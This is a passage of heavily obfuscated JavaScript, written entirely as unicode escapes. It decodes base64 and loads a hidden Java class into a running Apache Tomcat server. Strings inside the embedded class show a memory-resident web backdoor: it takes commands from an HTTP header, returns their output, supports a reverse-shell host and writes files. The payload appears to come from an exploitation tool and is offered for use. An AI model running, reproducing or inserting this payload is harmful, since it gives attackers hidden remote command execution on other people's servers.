u0028\u0065\u0072\u0072\u006f\u0072\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0065\u0072\u0072\u006f\u0072\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0066\u0069\u006e\u0061\u006c\u006c\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006c\u007a\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0063\u006f\u006d\u006d\u006f\u006e\u0073\u002e\u0063\u006f\u0064\u0065\u0063\u002e\u0062\u0069\u006e\u0061\u0072\u0079\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0076\u0061\u0072\u0020\u0063\u006f\u0064\u0065\u003d\u005c\u0022\u0079\u0076\u0036\u0036\u0076\u0067\u0041\u0041\u0041\u0044\u0045\u0042\u006a\u0077\u006f\u0041\u0048\u0067\u0043\u006e\u0043\u0067\u0042\u0044\u0041\u004b\u0067\u004b\u0041\u0045\u004d\u0041\u0071\u0051\u006f\u0041\u0048\u0067\u0043\u0071\u0043\u0041\u0043\u0072\u0043\u0067\u0041\u0063\u0041\u004b\u0077\u004b\u0041\u004b\u0030\u0041\u0072\u0067\u006f\u0041\u0072\u0051\u0043\u0076\u0042\u0077\u0043\u0077\u0043\u0067\u0042\u0044\u0041\u004c\u0045\u0049\u0041\u004a\u0038\u004b\u0041\u0043\u0045\u0041\u0073\u0067\u0067\u0041\u0073\u0077\u0067\u0041\u0074\u0041\u0063\u0041\u0074\u0051\u0067\u0041\u0074\u0067\u0067\u0041\u0074\u0077\u0063\u0041\u0075\u0041\u006f\u0041\u0048\u0041\u0043\u0035\u0043\u0041\u0043\u0036\u0043\u0041\u0043\u0037\u0042\u0077\u0043\u0038\u0043\u0077\u0041\u0057\u0041\u004c\u0030\u004c\u0041\u004c\u0034\u0041\u0076\u0077\u0073\u0041\u0076\u0067\u0044\u0041\u0043\u0041\u0044\u0042\u0043\u0041\u0044\u0043\u0042\u0077\u0044\u0044\u0043\u0067\u0041\u0063\u0041\u004d\u0051\u0048\u0041\u004d\u0055\u004b\u0041\u004d\u0059\u0041\u0078\u0077\u0067\u0041\u0079\u0041\u0063\u0041\u0079\u0051\u0067\u0041\u0079\u0067\u006f\u0041\u006a\u0041\u0044\u004c\u0043\u0067\u0041\u0068\u0041\u004d\u0077\u0049\u0041\u004d\u0030\u004a\u0041\u004d\u0034\u0041\u007a\u0077\u006f\u0041\u007a\u0067\u0044\u0051\u0043\u0041\u0044\u0052\u0043\u0067\u0043\u004d\u0041\u004e\u0049\u004b\u0041\u0042\u0077\u0041\u0030\u0077\u0067\u0041\u0031\u0041\u0063\u0041\u0031\u0051\u006f\u0041\u0048\u0041\u0044\u0057\u0043\u0041\u0044\u0058\u0042\u0077\u0044\u0059\u0043\u0041\u0044\u005a\u0043\u0041\u0044\u0061\u0043\u0067\u0041\u0063\u0041\u004e\u0073\u0048\u0041\u004e\u0077\u004b\u0041\u0045\u004d\u0041\u0033\u0051\u006f\u0041\u0033\u0067\u0044\u0053\u0043\u0041\u0044\u0066\u0043\u0067\u0041\u0068\u0041\u004f\u0041\u0049\u0041\u004f\u0045\u004b\u0041\u0043\u0045\u0041\u0034\u0067\u0067\u0041\u0034\u0077\u006f\u0041\u0049\u0051\u0044\u006b\u0043\u0067\u0043\u004d\u0041\u004f\u0055\u0049\u0041\u004f\u0059\u004b\u0041\u0043\u0045\u0041\u0035\u0077\u0067\u0041\u0036\u0041\u006b\u0041\u006a\u0041\u0044\u0070\u0043\u0067\u0044\u004f\u0041\u004f\u006f\u004a\u0041\u0049\u0077\u0041\u0036\u0077\u0063\u0041\u0037\u0041\u006f\u0041\u0051\u0077\u0044\u0074\u0043\u0067\u0042\u0044\u0041\u004f\u0034\u0049\u0041\u004b\u0041\u0049\u0041\u004f\u0038\u0049\u0041\u0050\u0041\u004b\u0041\u0049\u0077\u0041\u0038\u0051\u0067\u0041\u0038\u0067\u006f\u0041\u006a\u0041\u0044\u007a\u0042\u0077\u0044\u0030\u0043\u0067\u0042\u004d\u0041\u0050\u0055\u0048\u0041\u0050\u0059\u004b\u0041\u0045\u0034\u0041\u0039\u0077\u006f\u0041\u006a\u0041\u0044\u0034\u0043\u0067\u0042\u004f\u0041\u0050\u006b\u004b\u0041\u0045\u0034\u0041\u002b\u0067\u006f\u0041\u0054\u0067\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0050\u0077\u004b\u0041\u0045\u0077\u0041\u002f\u0051\u006f\u0041\u0049\u0051\u0044\u002b\u0043\u0041\u0044\u002f\u0043\u0067\u0045\u0041\u0041\u0051\u0045\u004b\u0041\u0043\u0045\u0042\u0041\u0067\u0067\u0042\u0041\u0077\u0067\u0042\u0042\u0041\u0067\u0042\u0042\u0051\u0063\u0042\u0042\u0067\u006f\u0041\u0058\u0051\u0043\u006e\u0043\u0067\u0042\u0064\u0041\u0051\u0063\u0049\u0041\u0051\u0067\u004b\u0041\u0046\u0030\u0041\u002f\u0041\u0067\u0042\u0043\u0051\u0067\u0042\u0043\u0067\u0067\u0042\u0043\u0077\u0067\u0042\u0044\u0041\u006f\u0042\u0044\u0051\u0045\u004f\u0043\u0067\u0045\u004e\u0041\u0051\u0038\u0048\u0041\u0052\u0041\u004b\u0041\u0052\u0045\u0042\u0045\u0067\u006f\u0041\u0061\u0041\u0045\u0054\u0043\u0041\u0045\u0055\u0043\u0067\u0042\u006f\u0041\u0052\u0055\u004b\u0041\u0047\u0067\u0041\u0076\u0077\u006f\u0041\u0061\u0041\u0045\u0057\u0043\u0067\u0045\u0052\u0041\u0052\u0063\u004b\u0041\u0052\u0045\u0042\u0047\u0041\u0067\u0042\u0047\u0051\u0067\u0042\u0047\u0067\u006f\u0042\u0044\u0051\u0045\u0062\u0042\u0077\u0045\u0063\u0043\u0067\u0042\u0030\u0041\u0052\u0030\u004b\u0041\u0048\u0051\u0042\u0045\u0067\u006f\u0042\u0045\u0051\u0045\u0065\u0043\u0067\u0042\u0030\u0041\u0052\u0034\u004b\u0041\u0048\u0051\u0042\u0048\u0077\u006f\u0042\u0049\u0041\u0045\u0068\u0043\u0067\u0045\u0067\u0041\u0053\u0049\u004b\u0041\u0053\u004d\u0042\u004a\u0041\u006f\u0042\u0049\u0077\u0044\u0036\u0042\u0051\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0079\u0043\u0067\u0042\u0044\u0041\u0053\u0055\u004b\u0041\u0052\u0045\u0042\u004a\u0067\u006f\u0041\u0064\u0041\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0053\u0063\u004b\u0041\u004d\u0034\u0042\u004b\u0041\u006f\u0041\u006a\u0041\u0045\u0070\u0043\u0041\u0045\u0071\u0043\u0041\u0045\u0072\u0043\u0041\u0045\u0073\u0043\u0041\u0045\u0074\u0043\u0041\u0043\u006a\u0043\u0041\u0045\u0075\u0042\u0077\u0045\u0076\u0041\u0051\u0041\u0043\u0061\u0058\u0041\u0042\u0041\u0042\u004a\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0052\u0077\u0062\u0033\u004a\u0030\u0041\u0051\u0041\u0054\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0042\u006a\u0078\u0070\u0062\u006d\u006c\u0030\u0050\u0067\u0045\u0041\u0041\u0079\u0067\u0070\u0056\u0067\u0045\u0041\u0042\u0045\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0041\u0039\u004d\u0061\u0057\u0035\u006c\u0054\u006e\u0056\u0074\u0059\u006d\u0056\u0079\u0056\u0047\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u0070\u0046\u0065\u0047\u004e\u006c\u0063\u0048\u0052\u0070\u0062\u0032\u0035\u007a\u0041\u0051\u0041\u004a\u0062\u0047\u0039\u0068\u005a\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0041\u0051\u0041\u006c\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u004f\u0077\u0045\u0041\u0043\u0056\u004e\u0070\u005a\u0032\u0035\u0068\u0064\u0048\u0056\u0079\u005a\u0051\u0045\u0041\u004b\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0077\u0071\u0050\u006a\u0073\u0042\u0041\u0041\u0056\u0077\u0063\u006d\u0039\u0034\u0065\u0051\u0045\u0041\u004a\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0046\u0064\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0044\u0067\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u006d\u004e\u0073\u005a\u0057\u0046\u0079\u0055\u0047\u0046\u0079\u0059\u0057\u0030\u0042\u0041\u0041\u0052\u006c\u0065\u0047\u0056\u006a\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0051\u0045\u0041\u0046\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0074\u004a\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u0079\u0064\u0057\u0034\u0042\u0041\u0041\u005a\u006b\u005a\u0057\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0042\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u004b\u0055\u0032\u0039\u0031\u0063\u006d\u004e\u006c\u0052\u006d\u006c\u0073\u005a\u0051\u0045\u0041\u0042\u0030\u0045\u0030\u004c\u006d\u0070\u0068\u0064\u006d\u0045\u004d\u0041\u004a\u0045\u0041\u006b\u0067\u0077\u0042\u004d\u0041\u0045\u0078\u0044\u0041\u0045\u0079\u0041\u0054\u004d\u004d\u0041\u0054\u0051\u0042\u004e\u0051\u0045\u0041\u0042\u0033\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0048\u004d\u004d\u0041\u0054\u0059\u0042\u004e\u0077\u0063\u0042\u004f\u0041\u0077\u0042\u004f\u0051\u0045\u0036\u0044\u0041\u0045\u0037\u0041\u0054\u0077\u0042\u0041\u0042\u004e\u0062\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0044\u0041\u0045\u0039\u0041\u0054\u0034\u004d\u0041\u0054\u0038\u0042\u0051\u0041\u0045\u0041\u0042\u0047\u0068\u0030\u0064\u0048\u0041\u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0035\u0076\u0055\u0033\u0056\u006a\u0061\u0045\u005a\u0070\u005a\u0057\u0078\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0042\u0041\u0054\u0055\u0042\u0041\u0041\u005a\u006e\u0062\u0047\u0039\u0069\u0059\u0057\u0077\u0042\u0041\u0041\u0070\u0077\u0063\u006d\u0039\u006a\u005a\u0058\u004e\u007a\u0062\u0033\u004a\u007a\u0041\u0051\u0041\u004f\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u0078\u0070\u0063\u0033\u0051\u004d\u0041\u0055\u0049\u0042\u0051\u0077\u0063\u0042\u0052\u0041\u0077\u0042\u0052\u0051\u0046\u0047\u0044\u0041\u0046\u0048\u0041\u0055\u0067\u0042\u0041\u0041\u004e\u0079\u005a\u0058\u0045\u0042\u0041\u0041\u0074\u006e\u005a\u0058\u0052\u0053\u005a\u0058\u004e\u0077\u0062\u0032\u0035\u007a\u005a\u0051\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0077\u0077\u0042\u0053\u0051\u0046\u004b\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0041\u0063\u0042\u0053\u0077\u0077\u0042\u0054\u0041\u0046\u004e\u0041\u0051\u0041\u004a\u005a\u0032\u0056\u0030\u0053\u0047\u0056\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u0077\u0045\u0041\u0041\u0032\u004e\u0074\u005a\u0041\u0077\u0041\u006d\u0067\u0043\u0062\u0044\u0041\u0046\u004f\u0041\u0055\u0038\u0042\u0041\u0041\u006c\u007a\u005a\u0058\u0052\u0054\u0064\u0047\u0046\u0030\u0064\u0058\u004d\u0048\u0041\u0056\u0041\u004d\u0041\u0056\u0045\u0042\u0055\u0067\u0077\u0042\u0055\u0077\u0046\u0055\u0041\u0051\u0041\u006b\u0062\u0033\u004a\u006e\u004c\u006d\u0046\u0077\u0059\u0057\u004e\u006f\u005a\u0053\u0035\u0030\u0062\u0032\u0031\u006a\u0059\u0058\u0051\u0075\u0064\u0058\u0052\u0070\u0062\u0043\u0035\u0069\u0064\u0057\u0059\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004e\u006f\u0064\u0057\u0035\u0072\u0044\u0041\u0043\u0057\u0041\u004a\u0063\u004d\u0041\u0056\u0055\u0042\u0053\u0041\u0045\u0041\u0043\u0048\u004e\u006c\u0064\u0045\u004a\u0035\u0064\u0047\u0056\u007a\u0041\u0051\u0041\u0043\u0057\u0030\u0049\u004d\u0041\u0056\u0059\u0042\u0053\u0067\u0045\u0041\u0042\u0032\u0052\u0076\u0056\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0041\u0051\u0041\u0054\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0075\u0061\u0057\u0038\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004a\u0031\u005a\u006d\u005a\u006c\u0063\u0067\u0045\u0041\u0042\u0048\u0064\u0079\u0059\u0058\u0041\u004d\u0041\u0056\u0063\u0041\u006c\u0077\u0045\u0041\u0049\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0035\u0076\u0064\u0045\u005a\u0076\u0064\u0057\u0035\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0059\u0041\u0056\u006b\u0048\u0041\u0056\u006f\u0042\u0041\u0041\u0041\u004d\u0041\u0056\u0073\u0042\u0058\u0041\u0045\u0041\u0045\u0047\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0062\u006d\u0039\u0030\u0049\u0047\u0035\u0031\u0062\u0047\u0077\u004d\u0041\u0056\u0030\u0042\u0050\u0067\u0045\u0041\u0042\u0053\u004d\u006a\u0049\u0079\u004d\u006a\u0044\u0041\u0046\u0065\u0041\u0056\u0038\u004d\u0041\u004a\u0034\u0041\u006d\u0077\u0045\u0041\u0041\u0054\u006f\u004d\u0041\u0057\u0041\u0042\u0059\u0051\u0045\u0041\u0049\u006d\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0053\u0042\u006f\u0062\u0033\u004e\u0030\u0049\u0047\u005a\u0076\u0063\u006d\u0031\u0068\u0064\u0043\u0042\u006c\u0063\u006e\u004a\u0076\u0063\u0069\u0045\u004d\u0041\u0049\u0030\u0041\u006a\u0067\u0077\u0042\u0059\u0067\u0046\u006a\u0044\u0041\u0043\u0050\u0041\u004a\u0041\u0042\u0041\u0042\u0042\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0044\u0041\u0043\u0052\u0041\u0057\u0051\u004d\u0041\u0057\u0055\u0041\u006b\u0067\u0045\u0041\u0042\u0053\u0051\u006b\u004a\u0043\u0051\u006b\u0041\u0051\u0041\u0053\u005a\u006d\u006c\u0073\u005a\u0053\u0042\u006d\u0062\u0033\u004a\u0074\u0059\u0058\u0051\u0067\u005a\u0058\u004a\u0079\u0062\u0033\u0049\u0068\u0044\u0041\u0043\u0063\u0041\u004a\u0030\u0042\u0041\u0041\u0056\u0041\u0051\u0045\u0042\u0041\u0051\u0041\u0077\u0041\u006e\u0077\u0043\u0062\u0041\u0051\u0041\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0047\u0061\u0057\u0078\u006c\u0044\u0041\u0043\u0052\u0041\u0057\u0059\u0042\u0041\u0042\u0068\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u005a\u0070\u0062\u0047\u0056\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u004d\u0041\u004a\u0045\u0042\u005a\u0077\u0077\u0041\u006f\u0077\u0043\u006b\u0044\u0041\u0043\u0063\u0041\u0057\u0067\u004d\u0041\u0057\u006b\u0041\u006b\u0067\u0077\u0042\u0061\u0067\u0043\u0053\u0044\u0041\u0046\u0072\u0041\u0054\u0034\u004d\u0041\u0057\u0077\u0042\u0050\u0067\u0077\u0042\u0062\u0051\u0046\u0075\u0041\u0051\u0041\u0048\u0062\u0033\u004d\u0075\u0062\u006d\u0046\u0074\u005a\u0051\u0063\u0042\u0062\u0077\u0077\u0042\u0063\u0041\u0043\u0062\u0044\u0041\u0046\u0078\u0041\u0054\u0034\u0042\u0041\u0041\u004e\u0033\u0061\u0057\u0034\u0042\u0041\u0041\u0052\u0077\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0043\u004c\u0057\u0034\u0042\u0041\u0042\u0064\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\